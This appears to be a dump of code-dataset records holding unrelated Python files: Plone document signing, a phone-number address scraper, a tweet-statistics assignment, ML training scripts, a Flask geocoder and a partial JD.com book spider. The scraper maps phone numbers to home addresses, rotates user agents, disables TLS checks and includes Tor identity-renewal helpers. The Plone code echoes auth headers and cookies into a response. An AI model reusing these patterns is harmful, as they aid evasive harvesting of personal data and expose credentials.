\"\"\"\n lowerhtml = html.lower()\n if lowerhtml.find('')\n else:\n self.cooked_text = format_stx(cooked_text, level=self._stx_level)\n\n def edit(self, text_format='text/html', text='', file='', safety_belt=''):\n \"\"\"\n *used to be WorkflowAction(_edit)\n To add webDav support, we need to check if the content is locked, and if\n so return ResourceLockedError if not, call _edit.\n\n Note that this method expects to be called from a web form, and so\n disables header processing\n \"\"\"\n self.failIfLocked()\n if file and type(file) is not type(''):\n contents = file.read()\n if contents:\n text = self.text = contents\n if html_headcheck(text):\n text = bodyfinder(text)\n self.setFormat(text_format)\n self._edit(text=text, text_format=text_format, safety_belt=safety_belt)\n self.reindexObject()\n\n def CookedBody(self, stx_level=None, setlevel=0):\n \"\"\" The prepared basic rendering of an object. For Documents, this\n means pre-rendered structured text, or what was between the\n tags of HTML.\n\n If the format is html, and 'stx_level' is not passed in or is the\n same as the object's current settings, return the cached cooked\n text. Otherwise, recook. If we recook and 'setlevel' is true,\n then set the recooked text and stx_level on the object.\n \"\"\"\n if self.text_format == 'html' or self.text_format == 'plain' or stx_level is None or stx_level == self._stx_level:\n return self.cooked_text\n else:\n cooked = format_stx(self.cooked_text, stx_level)\n if setlevel:\n self._stx_level = stx_level\n self.cooked_text = cooked\n return cooked\n return\n\n def EditableBody(self):\n \"\"\" The editable body of text. This is the raw structured text, or\n in the case of HTML, what was between the tags.\n \"\"\"\n return self.no_signatures()\n\n def handleText(self, text, format=None, stx_level=None):\n \"\"\" Handles the raw text, returning headers, body, format \"\"\"\n headers = {}\n if not format:\n format = self.guessFormat(text)\n if format == 'html':\n parser = SimpleHTMLParser()\n parser.feed(text)\n headers.update(parser.metatags)\n if parser.title:\n headers['Title'] = parser.title\n body = bodyfinder(text)\n else:\n (headers, body) = parseHeadersBody(text, headers)\n if stx_level:\n self._stx_level = stx_level\n return (\n headers, body, format)\n\n def guessFormat(self, text):\n \"\"\" Simple stab at guessing the inner format of the text \"\"\"\n if html_headcheck(text):\n return 'html'\n else:\n return 'structured-text'\n\n def sign_bastioncrypto(self, REQUEST, RESPONSE):\n \"\"\"\n return the raw text suitable for our bastioncryptosign to clearsign it\n the Content-Type is set to application/x-crypto-signable\n \"\"\"\n r = []\n r.append('url:%s' % self.absolute_url())\n r.append('lock:1')\n member = getToolByName(self, 'portal_membership').getAuthenticatedMember()\n key_id = member.getProperty('email')\n r.append('arguments:--clearsign')\n try:\n if REQUEST._auth[(-1)] == '\\n':\n auth = REQUEST._auth[:-1]\n else:\n auth = REQUEST._auth\n r.append('auth:%s' % auth)\n except:\n pass\n\n r.append('cookie:%s' % REQUEST.environ.get('HTTP_COOKIE', ''))\n if wl_isLocked(self):\n mt = getToolByName(self, 'portal_membership')\n user_id = member.getId()\n for lock in self.wl_lockValues():\n if not lock.isValid():\n continue\n creator = lock.getCreator()\n if creator and creator[1] == user_id:\n r.append('lock-token:%s' % lock.getLockToken())\n if REQUEST.get('borrow_lock'):\n r.append('borrow_lock:1')\n break\n\n r.append('')\n RESPONSE.setHeader('Last-Modified', rfc1123_date())\n RESPONSE.setHeader('Content-Type', 'application/x-bastioncrypto')\n r.append(self.text)\n return ('\\n').join(r)\n\n def PUT(self, REQUEST, RESPONSE):\n \"\"\"\n return from our bastioncrypto (and anything else which is \n supposedly signing this thing) ...\n \"\"\"\n self.dav__init(REQUEST, RESPONSE)\n self.dav__simpleifhandler(REQUEST, RESPONSE, refresh=1)\n self._edit(REQUEST['BODYFILE'].read())\n RESPONSE.setStatus(204)\n return RESPONSE\n\n\nAccessControl.class_init.InitializeClass(SignedDocument)\n\ndef addSignedDocument(self, id, title=''):\n \"\"\"\n Plone ctor for Signed Document\n \"\"\"\n self._setObject(id, SignedDocument(id, title=title))\n return id","sub_path":"pycfiles/Products.BastionCrypto-4.0.2-py2.6/SignedDocument.py","file_name":"SignedDocument.py","file_ext":"py","file_size_in_byte":8186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"22293354","text":"import requests\nfrom lxml import html\nimport sys\nimport pymysql\nfrom bs4 import BeautifulSoup\nfrom stem import Signal\nfrom stem.control import Controller\nimport time\nimport random\nimport string\nimport pandas as pd\n\nheaders={'User-Agent': 'Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}\nUAS = (\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1\", \n \"Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0\",\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0\",\n \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36\",\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36\",\n )\nua = UAS[random.randrange(len(UAS))]\nheaders = {'user-agent':ua}\ntranslator = str.maketrans(string.punctuation, ' '*len(string.punctuation))\n\n\ndef get_tor_session():\n session = requests.session()\n # Tor uses the 9050 port as the default socks port\n session.proxies = {'http': 'socks5://127.0.0.1:9050',\n 'https': 'socks5://127.0.0.1:9050'}\n return session\n\n# signal TOR for a new connection \ndef renew_connection():\n with Controller.from_port(port = 9051) as controller:\n controller.authenticate(password=\"1234\")\n controller.signal(Signal.NEWNYM)\n\n\ndef db_connection():\n\tconn= pymysql.connect(\"localhost\",\"root\",\"root\",\"lookup\")\n\tcur=conn.cursor()\n\treturn conn,cur\n\n\ndef search_phone(number):\n\tnumber=number.translate(translator)\n\tnumber=\"\".join(number.split())\n\tprint(number)\n\tfinal_result=[]\n\tstreetaddress,locality,region,pcode=(\"\" for i in range(4))\n\turl=\"https://www.yellowpages.com/search?search_terms=\"+number+\"&geo_location_terms=global\"\n\ttry:\n\t\tr=requests.get(url,verify=False,timeout=30,headers=headers)\n\t\tprint(r.status_code)\n\t\tsoup=BeautifulSoup(r.content,\"html.parser\")\n\t\taddresses=soup.findAll(class_='street-address')\n\n\t\tif addresses:\n\t\t\twith open('output/'+number+'.txt','w',encoding='utf-8') as f:\n\t\t\t\n\t\t\t\tfor address in addresses:\n\t\t\t\t\tstreetaddress=address.text\n\t\t\t\t\tfor i in soup.findAll(class_='locality'):\n\t\t\t\t\t\tlocality=i.text.replace('\\xa0', '')\n\t\t\t\t\tfor x in soup.findAll(\"span\",itemprop=\"addressRegion\"):\n\t\t\t\t\t\tregion=x.text\n\t\t\t\t\tfor y in soup.findAll(\"span\",itemprop=\"postalCode\"):\n\t\t\t\t\t\tpcode=y.text\n\t\t\t\t\tresult={'number':number,'streetaddress':streetaddress,'locality':locality,'region':region,'pcode':pcode}\n\t\t\t\t\tfinal_result.append(result)\n\t\t\t\tprint(final_result)\n\t\t\t\tf.write(str(final_result))\n\t\t\t\tf.close()\n\t\treturn 1,final_result\n\texcept:\n\t\tprint('>>>>>>>>>>error')\n\t\t\t\n\nif __name__ == '__main__':\n\n\t# number='518-234-2000'\n\t# number=sys.argv[1]\n\tindputdata=pd.read_csv('contacts_1.csv').head(100)\n\tindputdata=indputdata.Domain\n\t# print(session.get(\"http://httpbin.org/ip\").text)\n\tfor i in indputdata:\n\t\ttime.sleep(2)\n\t\tsearch_phone(i)\n","sub_path":"phone_number_lookup_1.py","file_name":"phone_number_lookup_1.py","file_ext":"py","file_size_in_byte":3090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"40112790","text":"def main():\r\n f = open(\"C:\\\\cp949\\\\cp949\\\\user.txt\", \"r\")\r\n lis = []\r\n while True:\r\n a = f.readline()\r\n a = a[0:-1]\r\n if not a: break\r\n f.readline()\r\n b = f.readline()\r\n b = b[0:-1]\r\n user = {'Id number': a, 'screen name': b}\r\n f.readline()\r\n lis.append(user)\r\n\r\n f.close()\r\n f = open(\"C:\\\\cp949\\\\cp949\\\\friend.txt\", \"r\")\r\n for i in range(len(lis)):\r\n lis[i]['friends'] = []\r\n while True:\r\n a = f.readline()\r\n a = a[0:-1]\r\n b = f.readline()\r\n b = b[0:-1]\r\n f.readline()\r\n i = 0\r\n if not a: break\r\n for i in range(len(lis)):\r\n h = lis[i].get('Id number')\r\n\r\n if a == h:\r\n lis[i]['friends'].append(b) # 친구관계 저장\r\n break\r\n f.close()\r\n\r\n f = open(\"C:\\\\cp949\\\\cp949\\\\word.txt\", \"r\")\r\n for i in range(len(lis)):\r\n lis[i][\"tweet\"] = []\r\n while True:\r\n a = f.readline()\r\n a = a[0:-1]\r\n if not a: break\r\n f.readline()\r\n b = f.readline()\r\n b = b[0:-1]\r\n f.readline()\r\n for i in range(len(lis)):\r\n h = lis[i].get('Id number')\r\n if a == h:\r\n lis[i]['tweet'].append(b)\r\n break\r\n f.close()\r\n\r\n word_temp = ''\r\n while True:\r\n print(\"\"\"0. Read data files\r\n 1. display statistics\r\n 2. Top 5 most tweeted words\r\n 3. Top 5 most tweeted users\r\n 4. Find users who tweeted a word (e.g., ’연세대’)\r\n 5. Find all people who are friends of the above users\r\n 6. Delete all mentions of a word\r\n 7. Delete all users who mentioned a word\r\n 8. Find strongly connected components\r\n 9. Find shortest path from a given user\r\n 99. Quit\r\n Select Menu:\"\"\", end='')\r\n a = input()\r\n if a == '0':\r\n fn = 0\r\n for i in range(len(lis)):\r\n w = len(lis[i]['friends'])\r\n fn += w\r\n for j in range(len(lis[i]['friends'])):\r\n s = lis[i].get('friends')\r\n idn = lis[i].get('Id number')\r\n sd = s[j]\r\n for y in range(i + 1, len(lis) - 1):\r\n if lis[y].get('Id number') == sd and idn in lis[y]['friends']:\r\n fn -= 1 # 겹치는거 뺀 총 친구관계 fn\r\n tw = 0\r\n for i in range(len(lis)):\r\n e = len(lis[i]['tweet'])\r\n tw += e # 총트위트수\r\n print(\"Total users: %s\" % len(lis))\r\n print(\"Total friendship records: %s\" % fn)\r\n print(\"Total tweets: %s\" % tw)\r\n elif a == '1':\r\n tw = 0\r\n for i in range(len(lis)):\r\n e = len(lis[i]['tweet'])\r\n tw += e # 총트위트수\r\n atw = tw / len(lis)\r\n arrangeTw = []\r\n for i in range(len(lis)):\r\n e = len(lis[i]['tweet'])\r\n arrangeTw.append(e)\r\n arrangeTw.sort()\r\n fn = 0\r\n arrangeFn = []\r\n for i in range(len(lis)):\r\n w = len(lis[i]['friends'])\r\n fn += w\r\n for j in range(len(lis[i]['friends'])):\r\n s = lis[i].get('friends')\r\n idn = lis[i].get('Id number')\r\n sd = s[j]\r\n for y in range(i + 1, len(lis) - 1):\r\n if lis[y].get('Id number') == sd and idn in lis[y]['friends']:\r\n fn -= 1 # 겹치는거 뺀 총 친구관계 fn\r\n arrangeFn.append(w)\r\n arrangeFn.sort()\r\n anf = fn / len(lis)\r\n print('Average number of friends: %s' % anf)\r\n print('Minimum friends: %s' % arrangeFn[0])\r\n print('Maximum number of friends: %s' % arrangeFn[len(lis)-1])\r\n print('')\r\n print('Average tweets per user: %s' % atw)\r\n print('Minium tweets per user: %s' % arrangeTw[0])\r\n print('Maximu tweets per user: %s' % arrangeTw[len(lis)-1])\r\n elif a == '2':\r\n arrangeTw = []\r\n Tw = []\r\n for i in range(len(lis)):\r\n e = len(lis[i]['tweet'])\r\n arrangeTw.append(e)\r\n arrangeTw.sort()\r\n for i in range(len(lis)):\r\n for j in range(len(lis[i]['tweet'])):\r\n Tw.append(lis[i]['tweet'][j])\r\n Tw.sort()\r\n s = 0\r\n Tlist = []\r\n Tnumb = 0\r\n for i in range(len(Tw)):\r\n if i == len(Tw) - 1:\r\n Tnumb += 1\r\n Tdict = {'word': Tw[s], 'number': Tnumb}\r\n Tlist.append(Tdict)\r\n elif Tw[s] == Tw[i]:\r\n Tnumb += 1\r\n else: # Tw[s] != Tw[i]\r\n Tdict = {'word': Tw[s], 'number': Tnumb}\r\n Tlist.append(Tdict)\r\n s = i\r\n Tnumb = 1\r\n for i in range(len(Tlist)):\r\n for j in range(i + 1, len(Tlist) - 1):\r\n if Tlist[i]['number'] < Tlist[j]['number']:\r\n Tlist[i], Tlist[j] = Tlist[j], Tlist[i]\r\n print('단어: %s 개수: %s' % (Tlist[0].get('word'), Tlist[0].get('number')))\r\n print('단어: %s 개수: %s' % (Tlist[1].get('word'), Tlist[1].get('number')))\r\n print('단어: %s 개수: %s' % (Tlist[2].get('word'), Tlist[2].get('number')))\r\n print('단어: %s 개수: %s' % (Tlist[3].get('word'), Tlist[3].get('number')))\r\n print('단어: %s 개수: %s' % (Tlist[4].get('word'), Tlist[4].get('number')))\r\n elif a == '3':\r\n mtu = [] # most tweeted users\r\n for i in range(len(lis)):\r\n usertweet = {'Id': lis[i].get('screen name'), 'Twn': len(lis[i].get('tweet'))}\r\n mtu.append(usertweet)\r\n for i in range(len(mtu)):\r\n for j in range(i + 1, len(mtu)):\r\n if mtu[i]['Twn'] < mtu[j]['Twn']:\r\n mtu[i], mtu[j] = mtu[j], mtu[i]\r\n print('닉네임: %s 트윗 수: %s' % (mtu[0].get('Id'), mtu[0].get('Twn')))\r\n print('닉네임: %s 트윗 수: %s' % (mtu[1].get('Id'), mtu[1].get('Twn')))\r\n print('닉네임: %s 트윗 수: %s' % (mtu[2].get('Id'), mtu[2].get('Twn')))\r\n print('닉네임: %s 트윗 수: %s' % (mtu[3].get('Id'), mtu[3].get('Twn')))\r\n print('닉네임: %s 트윗 수: %s' % (mtu[4].get('Id'), mtu[4].get('Twn')))\r\n elif a == '4' or a == '5':\r\n if a == '4':\r\n word = input()\r\n wordusers = []\r\n for i in range(len(lis)):\r\n for j in range(len(lis[i]['tweet'])):\r\n if lis[i]['tweet'][j] == word:\r\n ha = {'nick': lis[i]['screen name'], 'fri': lis[i]['friends']}\r\n wordusers.append(ha)\r\n break\r\n word_temp = word\r\n for i in range(len(wordusers)):\r\n print(wordusers[i]['nick'])\r\n elif a == '5':\r\n if word_temp != '':\r\n for i in range(len(wordusers)):\r\n\r\n print(\"닉네임: %s 친구: %s\" % (wordusers[i]['nick'], wordusers[i]['fri']))\r\n else:\r\n print(\"입력값이 없습니다. 4를 입력 후 찾고싶은 word를 적어주세요\")\r\n elif a == '6':\r\n delword = input()\r\n for i in range(len(lis)):\r\n t = len(lis[i]['tweet'])\r\n h = []\r\n for j in range(t):\r\n if delword == lis[i]['tweet'][j]:\r\n h.append(lis[i]['tweet'][j])\r\n for k in range(len(h)):\r\n lis[i]['tweet'].remove(h[k])\r\n elif a == '7':\r\n deluser = input()\r\n ht = []\r\n for i in range(len(lis)):\r\n t = len(lis[i]['tweet'])\r\n for j in range(t):\r\n if deluser == lis[i]['tweet'][j]:\r\n ht.append(lis[i])\r\n break\r\n for k in range(len(ht)):\r\n lis.remove(ht[k])\r\n elif a == '8':\r\n pass\r\n elif a == '9':\r\n pass\r\n elif a == '99':\r\n break\r\nmain()","sub_path":"assignment.py","file_name":"assignment.py","file_ext":"py","file_size_in_byte":8552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"517385634","text":"#!/usr/bin/env python\n\n\"\"\"\nGlobal Python log configuration settings\n@author mblum\n\"\"\"\n\nfrom __future__ import division\nfrom __future__ import absolute_import\nfrom __future__ import print_function\n\nimport logging\nimport os\nimport sys, traceback\n\nLEVELS = {'debug': logging.DEBUG,\n 'info': logging.INFO,\n 'warning': logging.WARNING,\n 'error': logging.ERROR,\n 'critical': logging.CRITICAL}\n\nLOG_FORMAT = '%(asctime)s %(name)s:%(levelname)-8s %(message)s'\nLOG_DATE_FORMAT = '%a, %d %b %Y %H:%M:%S'\nOFFSET = '\\t'*5\n\nclass Log4Py(logging.Logger):\n def _log(self, level, msg, args, exc_info=None, extra=None):\n # call parent logging method\n super(Log4Py, self)._log(level, msg, args, exc_info, extra)\n metadata = None\n if len(args) == 0:\n pass\n elif (args is not None) and (args[0] is not None):\n metadata = args[0]\n if 'exception' in metadata:\n exception = metadata['exception']\n exc_type, exc_value, exc_traceback = sys.exc_info()\n stack_trace_header = traceback.format_exception_only(type(exception), exception)\n # remove newlines\n for index, line in enumerate(stack_trace_header):\n stack_trace_header[index] = line.replace('\\n', '')\n stack_trace_body = traceback.format_exc().splitlines()\n stack_trace = stack_trace_header + stack_trace_body\n super(Log4Py, self)._log(level, '\\n{}'.format(OFFSET).join(stack_trace), args)\n\ndef getLogger(name, filename=None, level='debug'):\n \"\"\"\n Instantiate a global logger\n LOG_FILE - defaults to temp.log in the working directory\n LOG_LEVEL - defaults to DEBUG\n\n Find configuration details here:\n https://docs.python.org/2/howto/logging-cookbook.html\n \"\"\"\n log_file = filename\n log_level = level\n logging.basicConfig(level=LEVELS[log_level],\n format=LOG_FORMAT,\n datefmt=LOG_DATE_FORMAT,\n filename=log_file)\n print('configuring logging: {level} to {log}'.format(level=log_level,\n log=log_file))\n # setup custom logger\n logging.setLoggerClass(Log4Py)\n logger = logging.getLogger(name)\n return logger","sub_path":"log4py.py","file_name":"log4py.py","file_ext":"py","file_size_in_byte":2345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"443280198","text":"from pathlib import Path\nimport pickle\nimport gzip\nimport requests\nimport numpy as np\nimport torch\nfrom torch import nn, optim\nfrom torch.utils.data import TensorDataset, DataLoader\nimport torch.nn.functional as F\n\nlr = 0.5 # learning rate\nepochs = 2 # how many epochs to train for\n\nDATA_PATH = Path('data')\nPATH = DATA_PATH / 'mnist'\n\nDATA_PATH.mkdir(parents=True, exist_ok=True)\n\nURL = 'http://deeplearning.net/data/mnist/'\nFILENAME = 'mnist.pkl.gz'\n\nif not (PATH / FILENAME).exists():\n content = requests.get(URL + FILENAME).content\n (PATH / FILENAME).open('wb').write(content)\nwith gzip.open((PATH / FILENAME).as_posix(), \"rb\") as f:\n ((x_train, y_train), (x_valid, y_valid), _) = pickle.load(f, encoding=\"latin-1\")\n\nx_train, y_train, x_valid, y_valid = map(\n torch.tensor, (x_train, y_train, x_valid, y_valid)\n)\ntrain_ds = TensorDataset(x_train, y_train)\nvalid_ds = TensorDataset(x_valid, y_valid)\nbs = 4\nclass WrappedDataLoader:\n def __init__(self, dl, func):\n self.dl = dl\n self.func = func\n\n def __len__(self):\n return len(self.dl)\n\n def __iter__(self):\n batches = iter(self.dl)\n for b in batches:\n yield (self.func(*b))\n\n\ndef preprocess(x, y):\n return x.view(-1, 1, 28, 28), y\n\n\ndef get_data(train_ds, valid_ds, bs):\n return (\n DataLoader(train_ds, batch_size=bs, shuffle=True),\n DataLoader(valid_ds, batch_size=bs * 2),\n )\n\n\ntrain_dl, valid_dl = get_data(train_ds, valid_ds, bs)\ntrain_dl = WrappedDataLoader(train_dl, preprocess)\nvalid_dl = WrappedDataLoader(valid_dl, preprocess)\n\n\nclass Lambda(nn.Module):\n def __init__(self, func):\n super().__init__()\n self.func = func\n\n def forward(self, x):\n return self.func(x)\n\n\ndef loss_batch(model, loss_func, xb, yb, opt=None):\n loss = loss_func(model(xb), yb)\n\n if opt is not None:\n loss.backward()\n opt.step()\n opt.zero_grad()\n\n return loss.item(), len(xb)\n\n\ndef fit(epochs, model, loss_func, opt, train_dl, valid_dl):\n for epoch in range(epochs):\n batch_num = 0\n model.train()\n for xb, yb in train_dl:\n print(xb.shape, yb.shape)\n # print('Epoch [{}]\\tBatch [{}]'.format(epoch, batch_num))\n loss_batch(model, loss_func, xb, yb, opt)\n batch_num += 1\n\n model.eval()\n with torch.no_grad():\n losses, nums = zip(\n *[loss_batch(model, loss_func, xb, yb) for xb, yb in valid_dl]\n )\n val_loss = np.sum(np.multiply(losses, nums)) / np.sum(nums)\n\n print(epoch, val_loss)\n\n\nmodel = nn.Sequential(\n nn.Conv2d(in_channels=1, out_channels=16, kernel_size=3, stride=2, padding=1),\n nn.ReLU(),\n nn.Conv2d(in_channels=16, out_channels=16, kernel_size=3, stride=2, padding=1),\n nn.ReLU(),\n nn.Conv2d(in_channels=16, out_channels=10, kernel_size=3, stride=2, padding=1),\n nn.ReLU(),\n nn.AdaptiveAvgPool2d(1),\n Lambda(lambda x: x.view(x.size(0), -1))\n)\nopt = optim.SGD(model.parameters(), lr=lr, momentum=0.9)\nloss_func = F.cross_entropy\nfit(30, model, loss_func, opt, train_dl, valid_dl)\n\ndev = torch.device(\"cuda:3\") if torch.cuda.is_available() else torch.device(\"cpu\")\n","sub_path":"nn_study.py","file_name":"nn_study.py","file_ext":"py","file_size_in_byte":3215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"97042927","text":"from dataset import load_data\nfrom models import MRnet\nfrom config import config\nimport torch\nfrom torch.utils.tensorboard import SummaryWriter\nfrom utils import _train_model, _evaluate_model, _get_lr\nimport time\nimport torch.utils.data as data\nimport os\n\n\"\"\"Performs training of a specified model.\n \nInput params:\n config_file: Takes in configurations to train with \n\"\"\"\n\ndef train(config : dict):\n \"\"\"\n Function where actual training takes place\n\n Args:\n config (dict) : Configuration to train with\n \"\"\"\n \n print('Starting to Train Model...')\n\n train_loader, val_loader, train_wts, val_wts = load_data(config['task'])\n\n print('Initializing Model...')\n model = MRnet()\n if torch.cuda.is_available():\n model = model.cuda()\n train_wts = train_wts.cuda()\n val_wts = val_wts.cuda()\n\n print('Initializing Loss Method...')\n criterion = torch.nn.BCEWithLogitsLoss(pos_weight=train_wts)\n val_criterion = torch.nn.BCEWithLogitsLoss(pos_weight=val_wts)\n\n if torch.cuda.is_available():\n criterion = criterion.cuda()\n val_criterion = val_criterion.cuda()\n\n print('Setup the Optimizer')\n optimizer = torch.optim.Adam(model.parameters(), lr=config['lr'], weight_decay=config['weight_decay'])\n scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(\n optimizer, patience=3, factor=.3, threshold=1e-4, verbose=True)\n \n starting_epoch = config['starting_epoch']\n num_epochs = config['max_epoch']\n patience = config['patience']\n log_train = config['log_train']\n log_val = config['log_val']\n\n best_val_loss = float('inf')\n best_val_auc = float(0)\n\n print('Starting Training')\n\n writer = SummaryWriter(comment='lr={} task={}'.format(config['lr'], config['task']))\n t_start_training = time.time()\n\n for epoch in range(starting_epoch, num_epochs):\n\n current_lr = _get_lr(optimizer)\n epoch_start_time = time.time() # timer for entire epoch\n\n train_loss, train_auc = _train_model(\n model, train_loader, epoch, num_epochs, optimizer, criterion, writer, current_lr, log_train)\n\n val_loss, val_auc = _evaluate_model(\n model, val_loader, val_criterion, epoch, num_epochs, writer, current_lr, log_val)\n\n writer.add_scalar('Train/Avg Loss', train_loss, epoch)\n writer.add_scalar('Val/Avg Loss', val_loss, epoch)\n\n scheduler.step(val_loss)\n\n t_end = time.time()\n delta = t_end - epoch_start_time\n\n print(\"train loss : {0} | train auc {1} | val loss {2} | val auc {3} | elapsed time {4} s\".format(\n train_loss, train_auc, val_loss, val_auc, delta))\n\n print('-' * 30)\n\n writer.flush()\n\n if val_auc > best_val_auc:\n best_val_auc = val_auc\n\n if bool(config['save_model']):\n file_name = 'model_{}_{}_val_auc_{:0.4f}_train_auc_{:0.4f}_epoch_{}.pth'.format(config['exp_name'], config['task'], val_auc, train_auc, epoch+1)\n torch.save({\n 'model_state_dict': model.state_dict()\n }, './weights/{}/{}'.format(config['task'],file_name))\n\n t_end_training = time.time()\n print(f'training took {t_end_training - t_start_training} s')\n writer.flush()\n writer.close()\n\nif __name__ == '__main__':\n\n print('Training Configuration')\n print(config)\n\n train(config=config)\n\n print('Training Ended...')\n","sub_path":"MRNet-Single-Model/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"426654112","text":"\"\"\"1249. 移除无效的括号\n给你一个由 '('、')' 和小写字母组成的字符串 s。\n你需要从字符串中删除最少数目的 '(' 或者 ')'可以删除任意位置的括号),使得剩下的「括号字符串」有效。\n请返回任意一个合法字符串。\n有效「括号字符串」应当符合以下任意一条要求:\n空字符串或只包含小写字母的字符串\n可以被写作AB(A连接B)的字符串,其中A和B都是有效「括号字符串」\n可以被写作(A)的字符串,其中A一个有效的「括号字符串」\n示例 1:\n输入:s = \"lee(t(c)o)de)\"\n输出:\"lee(t(c)o)de\"\n解释:\"lee(t(co)de)\" , \"lee(t(c)ode)\" 也是一个可行答案。\n示例 2:\n输入:s = \"a)b(c)d\"\n输出:\"ab(c)d\"\n示例 3:\n输入:s = \"))((\"\n输出:\"\"\n解释:空字符串也是有效的\n示例 4:\n输入:s = \"(a(b(c)d)\"\n输出:\"a(b(c)d)\"\n\"\"\"\nclass Solution:\n def minRemoveToMakeValid(self, s: str):\n stack = []\n flag = []\n result =[]\n for i in range(len(s)):\n if s[i] == '(':\n stack.append(i)\n elif s[i] == ')':\n if stack:\n stack.pop()\n else:\n flag.append(i)\n else:\n continue\n # 加入多余的左括号的索引\n while stack:\n flag.append(stack.pop())\n for i in range(len(s)):\n if i not in flag:\n result.append(s[i])\n else:\n continue\n result = ''.join(result)\n return result\nsolution = Solution()\nresult = solution.minRemoveToMakeValid(\"lee(t(c)o)de)\")\nprint(result)\n\n\n\n\n\n\n","sub_path":"栈/1249. 移除无效的括号.py","file_name":"1249. 移除无效的括号.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"130856071","text":"from flask import Flask, render_template, request\nfrom redis import Redis\nfrom geopy.geocoders import Nominatim\n\napp = Flask(__name__)\nredis = Redis(host='redis',port=6379)\n\n@app.route('/')\ndef index():\n redis.incr('hits')\n return render_template('index.html', visitor=redis.get('hits'))\n\n@app.route('/address',methods = ['POST', 'GET'])\ndef result():\n\tif request.method == 'POST':\n\t\taddress = request.form\n\t\taddresstrans = \"%s, %s, %s, %s \" % ( request.form.get(\"Street\"), request.form.get(\"Number\"), request.form.get(\"City\"), request.form.get(\"Country\"))\n\t\tgeolocator = Nominatim(user_agent=\"Nadav\")\n\t\tlocation = geolocator.geocode(\"%s\" % addresstrans)\n\t\tcoordinate = \"%.12f', %.12f\" % (location.latitude, location.longitude)\n\t\treturn render_template(\"result.html\",address = address, coordinate = coordinate)\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\",debug=True)\n\n","sub_path":"geopy/flask-coordinate-inter/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"630519787","text":"import scrapy\nimport logging\nimport re\n\nlogger = logging.getLogger(__name__)\n\nclass JdbookSpider(scrapy.Spider):\n name = 'jdbook'\n allowed_domains = ['jd.com']\n headers = {\n \"referer\": \"https://book.jd.com/\",\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 Edg/87.0.664.47\"\n }\n\n # 主页需要特定的请求头,重写start_requests方法\n def start_requests(self):\n start_url = \"https://pjapi.jd.com/book/sort?source=bookSort\"\n yield scrapy.http.Request(\n url=start_url,\n callback=self.parse,\n headers=self.headers\n )\n\n def parse(self, response):\n data = response.json()\n if data[\"code\"] != 0:\n logger.warning(f\"url: {response.url} 主页请求数据失败\")\n return\n book_data = data[\"data\"]\n for b_cate in book_data:\n item = {}\n item[\"b_cate\"] = b_cate[\"categoryName\"]\n top_cate_id = int(b_cate[\"fatherCategoryId\"])\n father_cate_id = int(b_cate[\"categoryId\"])\n for s_cate in b_cate[\"sonList\"]:\n item[\"s_cate\"] = s_cate[\"categoryName\"]\n cate_id = int(s_cate[\"categoryId\"])\n # https://list.jd.com/list.html?cat=1713,3260,3341\n url = \"https://list.jd.com/list.html?cat=\" + \",\".join((str(id) for id in (top_cate_id, father_cate_id, cate_id)))\n yield scrapy.http.Request(\n url,\n callback=self.parse_book_list,\n headers=self.headers,\n meta={\"item\": item.copy()}\n )\n \n def parse_book_list(self, response):\n item = response.meta[\"item\"].copy()\n li_list = response.xpath(\"//div[@id='J_goodsList']/ul/li\")\n for li in li_list:\n url = li.xpath(\".//div[@class='p-img']/a/img/@data-lazy-img\").extract_first()\n if url:\n item[\"book_img\"] = response.urljoin(url)\n item[\"book_href\"] = response.urljoin(li.xpath(\".//div[@class='p-img']/a/@href\").extract_first())\n item[\"book_name\"] = li.xpath(\".//div[@class='p-name']/a/em/text()\").extract_first()\n item[\"book_author\"] = li.xpath(\".//div[@class='p-bookdetails']/span[@class='p-bi-name']/a/text()\").extract()\n item[\"book_publisher\"] = li.xpath(\".//div[@class='p-bookdetails']/span[@class='p-bi-store']/a/text()\").extract()\n item[\"book_publish_date\"] = li.xpath(\".//div[@class='p-bookdetails']/span[@class='p-bi-date']/text()\").extract_first()\n item[\"book_price\"] = li.xpath(\".//div[@class='p-price']//i/text()\").extract_first()\n print(item)\n yield item\n \n # 翻页,JD页数是按1,3,5,7...\n current_page = int(re.search(r\"page:\\\"(\\d+)\\\"\", response.text).group(1))\n count_page = int(re.search(r\"page_count:\\\"(\\d+)\\\"\", response.text).group(1))\n if current_page < count_page:\n next_page = current_page + 2\n next_url = re.sub(r\"page=\\d+\", \"page={}\".format(next_page), response.url)\n yield scrapy.http.Request(\n next_url,\n callback=self.parse_book_list,\n meta={\"item\": response.meta[\"item\"]}\n 